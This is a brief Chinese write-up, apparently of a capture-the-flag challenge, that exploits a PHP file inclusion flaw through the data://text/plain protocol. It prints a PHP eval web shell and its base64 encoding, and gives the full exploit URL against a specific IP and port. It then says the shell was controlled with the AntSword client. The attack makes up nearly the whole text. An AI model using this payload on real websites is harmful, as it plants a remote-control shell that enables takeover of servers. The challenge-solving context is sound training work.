这个考察的是文件包含。
通过data://text/plain协议来进行漏洞利用
这个我直接用了蚁剑进行了连接,
将<?php @eval($_POST['pass']) ?>转化为base64、PD9waHAgQGV2YWwoJF9QT1NUWydwYXNzJ10pID8+Cgo=
然后我门http://111.200.241.244:63659/?page=data://text/plain/;base64,PD9waHAgQGV2YWwoJF9QT1NUWydwYXNzJ10pID8+Cgo=
我们用蚁剑连接这个网站。